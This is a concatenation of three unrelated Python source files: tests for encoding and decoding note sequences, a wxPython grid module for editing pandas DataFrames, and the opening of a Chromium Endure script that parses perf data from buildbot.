def test_encode_and_index_note_sequence_multitrack(self):
ns = note_seq.NoteSequence()
ns.notes.add(start_time=0.0,
end_time=1.0,
pitch=37,
velocity=127,
is_drum=True)
ns.notes.add(start_time=1.0,
end_time=3.0,
pitch=61,
velocity=127,
program=0)
ns.notes.add(start_time=2.0,
end_time=4.0,
pitch=62,
velocity=127,
program=40)
ns.total_time = ns.notes[-1].end_time
frame_times = np.arange(0, 4, step=.001)
event_times, event_values = (
note_sequences.note_sequence_to_onsets_and_offsets_and_programs(ns))
(tokens, event_start_indices, event_end_indices, state_tokens,
state_event_indices) = run_length_encoding.encode_and_index_events(
state=note_sequences.NoteEncodingState(),
event_times=event_times, event_values=event_values,
encode_event_fn=note_sequences.note_event_data_to_events,
codec=codec, frame_times=frame_times,
encoding_state_to_events_fn=(
note_sequences.note_encoding_state_to_events))
self.assertEqual(len(frame_times), len(event_start_indices))
self.assertEqual(len(frame_times), len(event_end_indices))
self.assertEqual(len(frame_times), len(state_event_indices))
self.assertLen(tokens, 414)
expected_events = (
[event_codec.Event('velocity', 127), event_codec.Event('drum', 37)] +
[event_codec.Event('shift', 1)] * 100 +
[event_codec.Event('program', 0),
event_codec.Event('velocity', 127), event_codec.Event('pitch', 61)] +
[event_codec.Event('shift', 1)] * 100 +
[event_codec.Event('program', 40),
event_codec.Event('velocity', 127), event_codec.Event('pitch', 62)] +
[event_codec.Event('shift', 1)] * 100 +
[event_codec.Event('program', 0),
event_codec.Event('velocity', 0), event_codec.Event('pitch', 61)] +
[event_codec.Event('shift', 1)] * 100 +
[event_codec.Event('program', 40),
event_codec.Event('velocity', 0), event_codec.Event('pitch', 62)])
expected_tokens = [codec.encode_event(e) for e in expected_events]
np.testing.assert_array_equal(expected_tokens, tokens)
expected_state_events = [
event_codec.Event('tie', 0), # state prior to first drum
event_codec.Event('tie', 0), # state prior to first onset
event_codec.Event('program', 0), # state prior to second onset
event_codec.Event('pitch', 61), # |
event_codec.Event('tie', 0), # |
event_codec.Event('program', 0), # state prior to first offset
event_codec.Event('pitch', 61), # |
event_codec.Event('program', 40), # |
event_codec.Event('pitch', 62), # |
event_codec.Event('tie', 0), # |
event_codec.Event('program', 40), # state prior to second offset
event_codec.Event('pitch', 62), # |
event_codec.Event('tie', 0) # |
]
expected_state_tokens = [codec.encode_event(e)
for e in expected_state_events]
np.testing.assert_array_equal(expected_state_tokens, state_tokens)
self.assertEqual(event_start_indices[0], 0)
self.assertEqual(event_end_indices[0], 0)
self.assertEqual(state_event_indices[0], 0)
self.assertEqual(1.0, frame_times[1000])
self.assertEqual(event_start_indices[1000], 102)
self.assertEqual(event_end_indices[1000], 102)
self.assertEqual(state_event_indices[1000], 1)
self.assertEqual(2.0, frame_times[2000])
self.assertEqual(event_start_indices[2000], 205)
self.assertEqual(event_end_indices[2000], 205)
self.assertEqual(state_event_indices[2000], 2)
self.assertEqual(3.0, frame_times[3000])
self.assertEqual(event_start_indices[3000], 308)
self.assertEqual(event_end_indices[3000], 308)
self.assertEqual(state_event_indices[3000], 5)
self.assertEqual(3.999, frame_times[-1])
self.assertEqual(event_start_indices[-1], 410)
self.assertEqual(event_end_indices[-1], len(expected_events))
self.assertEqual(state_event_indices[-1], 10)
def test_encode_and_index_note_sequence_last_token_alignment(self):
ns = note_seq.NoteSequence()
ns.notes.add(start_time=0.0,
end_time=0.1,
pitch=60,
velocity=100)
ns.total_time = ns.notes[-1].end_time
frame_times = np.arange(0, 1.008, step=.008)
event_times, event_values = note_sequences.note_sequence_to_onsets(ns)
events, event_start_indices, event_end_indices, _, _ = run_length_encoding.encode_and_index_events(
state=None,
event_times=event_times,
event_values=event_values,
encode_event_fn=note_sequences.note_event_data_to_events,
codec=codec,
frame_times=frame_times)
self.assertEqual(len(frame_times), len(event_start_indices))
self.assertEqual(len(frame_times), len(event_end_indices))
self.assertLen(events, 102)
expected_events = [161] + [1] * 101
np.testing.assert_array_equal(expected_events, events)
self.assertEqual(event_start_indices[0], 0)
self.assertEqual(event_end_indices[0], 0)
self.assertEqual(event_start_indices[125], 101)
self.assertEqual(event_end_indices[125], 102)
def test_decode_note_sequence_events(self):
events = [25, 161, 50, 162]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_onset_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=100,
start_time=0.25,
end_time=0.26)
expected_ns.notes.add(
pitch=61,
velocity=100,
start_time=0.50,
end_time=0.51)
expected_ns.total_time = 0.51
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_onsets_only(self):
events = [5, 161, 25, 162]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_onset_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=100,
start_time=0.05,
end_time=0.06)
expected_ns.notes.add(
pitch=61,
velocity=100,
start_time=0.25,
end_time=0.26)
expected_ns.total_time = 0.26
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_velocity(self):
events = [5, 356, 161, 25, 229, 161]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=127,
start_time=0.05,
end_time=0.25)
expected_ns.total_time = 0.25
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_missing_offset(self):
events = [5, 356, 161, 10, 161, 25, 229, 161]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=127,
start_time=0.05,
end_time=0.10)
expected_ns.notes.add(
pitch=60,
velocity=127,
start_time=0.10,
end_time=0.25)
expected_ns.total_time = 0.25
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_multitrack(self):
events = [5, 525, 356, 161, 15, 356, 394, 25, 525, 229, 161]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=37,
velocity=127,
start_time=0.15,
end_time=0.16,
instrument=9,
is_drum=True)
expected_ns.notes.add(
pitch=60,
velocity=127,
start_time=0.05,
end_time=0.25,
program=40)
expected_ns.total_time = 0.25
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_invalid_tokens(self):
events = [5, -1, 161, -2, 25, 162, 9999]
decoding_state = note_sequences.NoteDecodingState()
invalid_events, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_onset_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(3, invalid_events)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=100,
start_time=0.05,
end_time=0.06)
expected_ns.notes.add(
pitch=61,
velocity=100,
start_time=0.25,
end_time=0.26)
expected_ns.total_time = 0.26
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_allow_event_at_exactly_max_time(self):
events = [161, 25, 162]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=1.0, max_time=1.25,
codec=codec, decode_event_fn=note_sequences.decode_note_onset_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=100,
start_time=1.00,
end_time=1.01)
expected_ns.notes.add(
pitch=61,
velocity=100,
start_time=1.25,
end_time=1.26)
expected_ns.total_time = 1.26
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_dropped_events(self):
events = [5, 161, 30, 162]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=1.0, max_time=1.25,
codec=codec, decode_event_fn=note_sequences.decode_note_onset_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(2, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=100,
start_time=1.05,
end_time=1.06)
expected_ns.total_time = 1.06
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_invalid_events(self):
events = [25, 230, 50, 161]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_onset_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(1, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=100,
start_time=0.50,
end_time=0.51)
expected_ns.total_time = 0.51
self.assertProtoEquals(expected_ns, ns)
if __name__ == '__main__':
tf.test.main()
|
|
#import matplotlib
#matplotlib.use('WXAgg')
import sys
import numpy as np
import pandas as pd
import wx
import wx.grid as gridlib
import wx.lib.mixins.gridlabelrenderer as gridlabelrenderer
class HugeTable(gridlib.GridTableBase):
"""
Table class for virtual grid
"""
def __init__(self, log, num_rows, num_cols):
gridlib.GridTableBase.__init__(self)
self.log = log
self.odd=gridlib.GridCellAttr()
#self.odd.SetBackgroundColour("sky blue")
self.even=gridlib.GridCellAttr()
#self.even.SetBackgroundColour("sea green")
self.num_rows = num_rows
self.num_cols = num_cols
self.dataframe = []
def GetAttr(self, row, col, kind):
attr = [self.even, self.odd][row % 2]
attr.IncRef()
return attr
def GetNumberRows(self):
return self.num_rows
def GetNumberCols(self):
return self.num_cols
def IsEmptyCell(self, row, col):
return False
def GetValue(self, row, col):
"""
Find the matching value from pandas DataFrame,
return it.
"""
if len(self.dataframe):
return str(self.dataframe.iloc[row, col])
return ''
def SetValue(self, row, col, value):
"""
Set value in the pandas DataFrame
"""
self.dataframe.iloc[row, col] = value
def SetColumnValues(self, col, value):
"""
Custom method to efficiently set all values
in a column.
Parameters
----------
col : str or int
name or index position of column
value : list-like
values to assign to all cells in the column
"""
try:
self.dataframe.iloc[:, col] = value
except ValueError:
self.dataframe.loc[:, col] = value
def GetColLabelValue(self, col):
"""
Get col label from dataframe
"""
if len(self.dataframe):
return self.dataframe.columns[col]
return ''
def SetColLabelValue(self, col, value):
"""
Set col label value in dataframe
"""
if len(self.dataframe):
col_name = str(self.dataframe.columns[col])
self.dataframe.rename(columns={col_name: str(value)}, inplace=True)
return None
def AppendCols(self, *args):
self.num_cols += 1
msg = gridlib.GridTableMessage(self, # The table
gridlib.GRIDTABLE_NOTIFY_COLS_APPENDED, # what we did to it
1) # how many
self.GetView().ProcessTableMessage(msg)
return True
# this currently fails with segfault
def DeleteCols(self, pos, numCols, updateLabels=True):
self.num_cols -= 1
grid = self.GetView()
grid.BeginBatch()
msg = gridlib.GridTableMessage(self,
gridlib.GRIDTABLE_NOTIFY_COLS_DELETED,
numCols)
grid.ProcessTableMessage(msg)
grid.EndBatch()
return True
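# Note: HugeTable is a "virtual" table -- the grid does not store cell data
# itself. GetValue/SetValue above read and write the underlying pandas
# DataFrame on demand, so large tables can be displayed without copying every
# cell into wx. A grid adopts the table via SetTable (see HugeMagicGrid below).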
class BaseMagicGrid(gridlib.Grid, gridlabelrenderer.GridWithLabelRenderersMixin):
"""
grid class
"""
def __init__(self, parent, name, row_labels, col_labels, size=0):
self.name = name
self.changes = None
self.row_labels = sorted(row_labels)
self.col_labels = col_labels
if not size:
super(BaseMagicGrid, self).__init__(parent, -1, name=name)
if size:
super(BaseMagicGrid, self).__init__(parent, -1, name=name, size=size)
gridlabelrenderer.GridWithLabelRenderersMixin.__init__(self)
### the next few lines may prove unnecessary
ancestry = ['specimen', 'sample', 'site', 'location', None]
if name == 'age':
self.parent_type = None
else:
try:
self.parent_type = ancestry[ancestry.index(name) + 1]
except ValueError:
self.parent_type = None
###
#self.InitUI()
def InitUI(self):
pass
def set_scrollbars(self):
"""
Set to always have vertical scrollbar.
Have horizontal scrollbar unless grid has very few rows.
Older versions of wxPython will choke on this,
in which case nothing happens.
"""
try:
if len(self.row_labels) < 5:
show_horizontal = wx.SHOW_SB_NEVER
else:
show_horizontal = wx.SHOW_SB_DEFAULT
self.ShowScrollbars(show_horizontal, wx.SHOW_SB_DEFAULT)
except AttributeError:
pass
def add_items(self, dataframe, hide_cols=()):
"""
Add items and/or update existing items in grid
"""
# replace "None" values with ""
dataframe = dataframe.fillna("")
# remove any columns that shouldn't be shown
for col in hide_cols:
if col in dataframe.columns:
del dataframe[col]
# add more rows
self.AppendRows(len(dataframe))
columns = dataframe.columns
row_num = -1
# fill in all rows with appropriate values
for ind, row in dataframe.iterrows():
row_num += 1
for col_num, col in enumerate(columns):
value = row[col]
self.SetCellValue(row_num, col_num, str(value))
# set citation default value
if col == 'citations':
citation = row['citations']
if (citation is None) or (citation is np.nan):
self.SetCellValue(row_num, col_num, 'This study')
else:
if 'This study' not in citation:
if len(citation):
citation += ':'
citation += 'This study'
self.SetCellValue(row_num, col_num, citation)
self.row_labels.extend(dataframe.index)
def save_items(self, rows=None, verbose=False):
"""
Return a dictionary of row data for selected rows:
{1: {col1: val1, col2: val2}, ...}
If a list of row numbers isn't provided, get data for all.
"""
if rows:
rows = rows
else:
rows = list(range(self.GetNumberRows()))
cols = list(range(self.GetNumberCols()))
data = {}
for row in rows:
data[row] = {}
for col in cols:
col_name = self.GetColLabelValue(col)
if verbose:
print(col_name, ":", self.GetCellValue(row, col))
data[row][col_name] = self.GetCellValue(row, col)
return data
def size_grid(self, event=None):
self.AutoSizeColumns(True)
for col in range(len(self.col_labels)):
# adjust column widths to be a little larger than auto for nicer editing
orig_size = self.GetColSize(col)
if orig_size > 110:
size = orig_size * 1.1
else:
size = orig_size * 1.6
self.SetColSize(col, size)
self.ForceRefresh()
def do_event_bindings(self):
self.Bind(gridlib.EVT_GRID_EDITOR_CREATED, self.on_edit_grid)
self.Bind(gridlib.EVT_GRID_EDITOR_SHOWN, self.on_edit_grid)
self.Bind(wx.EVT_KEY_DOWN, self.on_key_down)
#self.Bind(wx.EVT_TEXT, self.on_key_down_in_editor)
#self.Bind(wx.EVT_CHAR, self.on_key_down)
self.Bind(wx.EVT_TEXT_PASTE, self.on_paste_in_editor)
def on_edit_grid(self, event):
"""sets self.changes to true when user edits the grid.
provides down and up key functionality for exiting the editor"""
if not self.changes:
self.changes = {event.Row}
else:
self.changes.add(event.Row)
#self.changes = True
try:
editor = event.GetControl()
editor.Bind(wx.EVT_KEY_DOWN, self.onEditorKey)
except AttributeError:
# if it's a EVT_GRID_EDITOR_SHOWN, it doesn't have the GetControl method
pass
def onEditorKey(self, event):
keycode = event.GetKeyCode()
if keycode == wx.WXK_UP:
self.MoveCursorUp(False)
self.MoveCursorDown(False)# have this in because otherwise cursor moves up 2 rows
elif keycode == wx.WXK_DOWN:
self.MoveCursorDown(False)
self.MoveCursorUp(False) # have this in because otherwise cursor moves down 2 rows
#elif keycode == wx.WXK_LEFT:
# grid.MoveCursorLeft(False)
#elif keycode == wx.WXK_RIGHT:
# grid.MoveCursorRight(False)
else:
pass
event.Skip()
def on_key_down(self, event):
keycode = event.GetKeyCode()
meta_down = event.MetaDown() or event.CmdDown()
if keycode == 86 and meta_down:
# treat it as if it were a wx.EVT_TEXT_PASTE
paste_event = wx.CommandEvent(wx.wxEVT_COMMAND_TEXT_PASTE,
self.GetId())
self.GetEventHandler().ProcessEvent(paste_event)
else:
event.Skip()
def on_paste_in_editor(self, event):
self.do_paste(event)
def do_paste(self, event):
"""
Read clipboard into dataframe
Paste data into grid, adding extra rows if needed
and ignoring extra columns.
"""
# find where the user has clicked
col_ind = self.GetGridCursorCol()
row_ind = self.GetGridCursorRow()
# read in clipboard text
text_df = pd.read_clipboard(header=None, sep='\t').fillna('')
# add extra rows if needed to accommodate clipboard text
row_length_diff = len(text_df) - (len(self.row_labels) - row_ind)
if row_length_diff > 0:
for n in range(row_length_diff):
self.add_row()
# ignore excess columns if present
col_length_diff = len(text_df.columns) - (len(self.col_labels) - col_ind)
if col_length_diff > 0:
text_df = text_df.iloc[:, :-col_length_diff].copy()
# go through copied text and parse it into the grid rows
for label, row_data in text_df.iterrows():
col_range = list(range(col_ind, col_ind + len(row_data)))
if len(row_data) > 1:
cols = list(zip(col_range, row_data.index))
for column in cols:
value = row_data[column[1]]
this_col = column[0]
self.SetCellValue(row_ind, this_col, str(value))
else:
value = row_data[0]
self.SetCellValue(row_ind, col_ind, str(value))
row_ind += 1
# could instead use wxPython clipboard here
# see old git history for that
self.size_grid()
event.Skip()
def add_row(self, label=""):
"""
Add a row to the grid
"""
self.AppendRows(1)
last_row = self.GetNumberRows() - 1
self.SetCellValue(last_row, 0, str(label))
self.row_labels.append(label)
def remove_row(self, row_num=None):
"""
Remove a row from the grid
"""
if not row_num and row_num != 0:
row_num = self.GetNumberRows() - 1
label = self.GetCellValue(row_num, 0)
self.DeleteRows(pos=row_num, numRows=1, updateLabels=True)
# remove label from row_labels
self.row_labels.pop(row_num)
if not self.changes:
self.changes = set()
self.changes.add(-1)
# fix #s for rows edited:
self.update_changes_after_row_delete(row_num)
def update_changes_after_row_delete(self, row_num):
"""
Update self.changes so that row numbers for edited rows are still correct.
I.e., if row 4 was edited and then row 2 was deleted, row 4 becomes row 3.
This function updates self.changes to reflect that.
"""
if row_num in self.changes.copy():
self.changes.remove(row_num)
updated_rows = []
for changed_row in self.changes:
if changed_row == -1:
updated_rows.append(-1)
if changed_row > row_num:
updated_rows.append(changed_row - 1)
if changed_row < row_num:
updated_rows.append(changed_row)
self.changes = set(updated_rows)
def remove_col(self, col_num):
"""
Remove a column from the grid.
Resize grid to display correctly.
"""
label_value = self.GetColLabelValue(col_num).strip('**').strip('^^')
self.col_labels.remove(label_value)
result = self.DeleteCols(pos=col_num, numCols=1, updateLabels=True)
self.size_grid()
return result
### Grid methods ###
"""
def onMouseOver(self, event, grid):
"
Displays a tooltip over any cell in a certain column
x, y = grid.CalcUnscrolledPosition(event.GetX(),event.GetY())
coords = grid.XYToCell(x, y)
col = coords[1]
row = coords[0]
# creates tooltip message for cells with long values
# note: this works with EPD for windows, and modern wxPython, but not with Canopy Python
msg = grid.GetCellValue(row, col)
if len(msg) > 15:
event.GetEventObject().SetToolTipString(msg)
else:
event.GetEventObject().SetToolTipString('')
def on_edit_grid(self, event, grid):
sets self.changes to true when user edits the grid.
provides down and up key functionality for exiting the editor
if not self.changes:
self.changes = {event.Row}
else:
self.changes.add(event.Row)
#self.changes = True
try:
editor = event.GetControl()
editor.Bind(wx.EVT_KEY_DOWN, lambda event: self.onEditorKey(event, grid))
except AttributeError: # if it's a EVT_GRID_EDITOR_SHOWN, it doesn't have the GetControl method
pass
def onEditorKey(self, event, grid):
keycode = event.GetKeyCode()
if keycode == wx.WXK_UP:
grid.MoveCursorUp(False)
grid.MoveCursorDown(False)# have this in because otherwise cursor moves up 2 rows
elif keycode == wx.WXK_DOWN:
grid.MoveCursorDown(False)
grid.MoveCursorUp(False) # have this in because otherwise cursor moves down 2 rows
#elif keycode == wx.WXK_LEFT:
# grid.MoveCursorLeft(False)
#elif keycode == wx.WXK_RIGHT:
# grid.MoveCursorRight(False)
else:
pass
event.Skip()
"""
def remove_starred_labels(self):#, grid):
cols_with_stars = []
cols_with_hats = []
for col in range(self.GetNumberCols()):
label = self.GetColLabelValue(col)
if '**' in label:
self.SetColLabelValue(col, label.strip('**'))
cols_with_stars.append(col)
if '^^' in label:
self.SetColLabelValue(col, label.strip('^^'))
cols_with_hats.append(col)
return cols_with_stars, cols_with_hats
def paint_invalid_row(self, row, color="LIGHT BLUE"):
self.SetRowLabelRenderer(row, MyRowLabelRenderer(color))
def paint_invalid_cell(self, row, col, color='MEDIUM VIOLET RED',
skip_cell=False):
"""
Take row, column, and turn it color
"""
self.SetColLabelRenderer(col, MyColLabelRenderer('#1101e0'))
self.SetRowLabelRenderer(row, MyRowLabelRenderer('#1101e0'))
# SetCellRenderer doesn't work with table-based grid (HugeGrid class)
if not skip_cell:
self.SetCellRenderer(row, col, MyCustomRenderer(color))
class MagicGrid(BaseMagicGrid):
"""
grid class
"""
def __init__(self, parent, name, row_labels, col_labels, size=0):
super(MagicGrid, self).__init__(parent, name, row_labels, col_labels, size=size)
def InitUI(self):
data = []
num_rows = len(self.row_labels)
num_cols = len(self.col_labels)
self.ClearGrid()
self.CreateGrid(num_rows, num_cols)
for n, row in enumerate(self.row_labels):
self.SetRowLabelValue(n, str(n+1))
self.SetCellValue(n, 0, row)
data.append(row)
# set column labels
for n, col in enumerate(self.col_labels):
self.SetColLabelValue(n, str(col))
# set scrollbars
self.set_scrollbars()
def add_col(self, label):
"""
Add a new column to the grid.
Resize grid to display the column.
Parameters
----------
label : str
Returns
---------
last_col: int
index column number of added col
"""
self.AppendCols(1, updateLabels=False)
last_col = self.GetNumberCols() - 1
self.SetColLabelValue(last_col, label)
self.col_labels.append(label)
self.size_grid()
return last_col
def add_items(self, dataframe, hide_cols=()):
"""
Add items and/or update existing items in grid
"""
# replace "None" values with ""
dataframe = dataframe.fillna("")
# remove any columns that shouldn't be shown
for col in hide_cols:
if col in dataframe.columns:
del dataframe[col]
# add more rows
self.AppendRows(len(dataframe))
columns = dataframe.columns
row_num = -1
# fill in all rows with appropriate values
for ind, row in dataframe.iterrows():
row_num += 1
for col_num, col in enumerate(columns):
value = row[col]
self.SetCellValue(row_num, col_num, str(value))
# set citation default value
if col == 'citations':
citation = row['citations']
if (citation is None) or (citation is np.nan):
self.SetCellValue(row_num, col_num, 'This study')
else:
if 'This study' not in citation:
if len(citation):
citation += ':'
citation += 'This study'
self.SetCellValue(row_num, col_num, citation)
self.row_labels.extend(dataframe.index)
def save_items(self, rows=None, verbose=False):
"""
Return a dictionary of row data for selected rows:
{1: {col1: val1, col2: val2}, ...}
If a list of row numbers isn't provided, get data for all.
"""
if rows:
rows = rows
else:
rows = range(self.GetNumberRows())
cols = range(self.GetNumberCols())
data = {}
for row in rows:
data[row] = {}
for col in cols:
col_name = self.GetColLabelValue(col)
if verbose:
print(col_name, ":", self.GetCellValue(row, col))
data[row][col_name] = self.GetCellValue(row, col)
return data
class HugeMagicGrid(BaseMagicGrid):
def __init__(self, parent, name, row_labels, col_labels, size=0):
super(HugeMagicGrid, self).__init__(parent, name, row_labels, col_labels, size=size)
# add table
table = HugeTable(sys.stdout, len(row_labels), len(col_labels))
self.table = table
# The second parameter means that the grid is to take ownership of the
# table and will destroy it when done. Otherwise you would need to keep
# a reference to it and call it's Destroy method later.
self.SetTable(table, True)
self.Bind(gridlib.EVT_GRID_CELL_RIGHT_CLICK, self.OnRightDown)
#self.InitUI()
def InitUI(self):
self.size_grid()
def add_items(self, dataframe, hide_cols=()):
# replace "None" values with ""
dataframe = dataframe.fillna("")
# remove any columns that shouldn't be shown
for col in hide_cols:
if col in dataframe.columns:
del dataframe[col]
self.table.dataframe = dataframe
def save_items(self):
"""
Return the table dataframe so that the parent contribution can be updated
"""
return self.table.dataframe
def SetColumnValues(self, col, data):
"""
Set a whole column worth of values
in self.table
"""
self.table.SetColumnValues(col, data)
def add_col(self, label):
"""
Update table dataframe, and append a new column
Parameters
----------
label : str
Returns
---------
last_col: int
index column number of added col
"""
self.table.dataframe[label] = ''
self.AppendCols(1, updateLabels=False)
last_col = self.table.GetNumberCols() - 1
self.SetColLabelValue(last_col, label)
self.col_labels.append(label)
self.size_grid()
return last_col
# this currently fails with segfault
def remove_col(self, col_num):
"""
update table dataframe, and remove a column.
resize grid to display correctly
"""
label_value = self.GetColLabelValue(col_num).strip('**').strip('^^')
self.col_labels.remove(label_value)
del self.table.dataframe[label_value]
result = self.DeleteCols(pos=col_num, numCols=1, updateLabels=True)
self.size_grid()
return result
def OnRightDown(self, event):
print(self.GetSelectedRows())
class MyCustomRenderer(gridlib.GridCellRenderer):
def __init__(self, color='MEDIUM VIOLET RED'):
gridlib.GridCellRenderer.__init__(self)
self.color = color
def Draw(self, grid, attr, dc, rect, row, col, isSelected):
#print 'grid', grid
#print 'attr', attr
#print 'dc', dc
#print 'rect', rect
#print 'row', row
#print 'col', col
#print 'isSelected', isSelected
#dc.SetPen(wx.TRANSPARENT_PEN)
# do it like this for filling in background:
dc.SetBackgroundMode(wx.SOLID)
dc.SetBrush(wx.Brush(self.color, wx.BDIAGONAL_HATCH))
# or do it like this for highlighting the cell:
#dc.SetPen(wx.Pen(self.color, 5, wx.SOLID))
dc.DrawRectangle(rect)
dc.SetBackgroundMode(wx.TRANSPARENT)
dc.SetFont(attr.GetFont())
text = grid.GetCellValue(row, col)
#colors = ["RED", "WHITE", "SKY BLUE"]
x = rect.x + 1
y = rect.y + 1
for ch in text:
dc.SetTextForeground("BLACK")
dc.DrawText(ch, x, y)
w, h = dc.GetTextExtent(ch)
x = x + w
if x > rect.right - 5:
break
def GetBestSize(self, grid, attr, dc, row, col):
text = grid.GetCellValue(row, col)
dc.SetFont(attr.GetFont())
w, h = dc.GetTextExtent(text)
return wx.Size(w, h)
def Clone(self):
return MyCustomRenderer()
class MyColLabelRenderer(gridlabelrenderer.GridLabelRenderer):
def __init__(self, bgcolor):
self._bgcolor = bgcolor
def Draw(self, grid, dc, rect, col):
dc.SetBrush(wx.Brush(self._bgcolor))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
#dc.SetPen(wx.TRANSPARENT_PEN)
dc.SetPen(wx.Pen('blue', 5, wx.DOT_DASH))
dc.DrawRectangle(rect)
hAlign, vAlign = grid.GetColLabelAlignment()
text = grid.GetColLabelValue(col)
self.DrawBorder(grid, dc, rect)
self.DrawText(grid, dc, rect, text, hAlign, vAlign)
class MyRowLabelRenderer(gridlabelrenderer.GridLabelRenderer):
def __init__(self, bgcolor):
self._bgcolor = bgcolor
def Draw(self, grid, dc, rect, row):
#dc.SetBrush(wx.Brush(self._bgcolor))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.SetPen(wx.Pen('blue', 5, wx.SHORT_DASH))
#dc.SetPen(wx.TRANSPARENT_PEN)
dc.DrawRectangle(rect)
hAlign, vAlign = grid.GetRowLabelAlignment()
text = grid.GetRowLabelValue(row)
self.DrawBorder(grid, dc, rect)
self.DrawText(grid, dc, rect, text, hAlign, vAlign)
|
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Script to parse perf data from Chrome Endure test executions, to be graphed.
This script connects via HTTP to a buildbot master in order to scrape and parse
perf data from Chrome Endure tests that have been run. The perf data is then
stored in local text files to be graphed by the Chrome Endure graphing code.
It is assumed that any Chrome Endure tests that show up on the waterfall have
names that are of the following form:
"endure_<webapp_name>-<test_name>" (non-Web Page Replay tests)
or
"endure_<webapp_name>_wpr-<test_name>" (Web Page Replay tests)
For example: "endure_gmail_wpr-testGmailComposeDiscard"
This script accepts either a URL or a local path as a buildbot location.
Its behavior depends on whether a URL or a local path is given.
When a URL is given, it gets buildbot logs from the buildbot builders URL
e.g. http://build.chromium.org/p/chromium.endure/builders/.
When a local path is given, it gets buildbot logs from buildbot's internal
files in the directory e.g. /home/chrome-bot/buildbot.
"""
import cPickle
import getpass
import logging
import optparse
import os
import re
import simplejson
import socket
import string
import sys
import time
import urllib
import urllib2
CHROME_ENDURE_SLAVE_NAMES = [
'Linux QA Perf (0)',
'Linux QA Perf (1)',
'Linux QA Perf (2)',
'Linux QA Perf (3)',
'Linux QA Perf (4)',
'Linux QA Perf (dbg)(0)',
'Linux QA Perf (dbg)(1)',
'Linux QA Perf (dbg)(2)',
'Linux QA Perf (dbg)(3)',
'Linux QA Perf (dbg)(4)',
]
BUILDER_URL_BASE = 'http://build.chromium.org/p/chromium.endure/builders/'
LAST_BUILD_NUM_PROCESSED_FILE = os.path.join(os.path.dirname(__file__),
'_parser_last_processed.txt')
LOCAL_GRAPH_DIR = '/home/%s/www/chrome_endure_clean' % getpass.getuser()
MANGLE_TRANSLATION = string.maketrans(' ()', '___')
def SetupBaseGraphDirIfNeeded(webapp_name, test_name, dest_dir):
"""Sets up the directory containing results for a particular test, if needed.
Args:
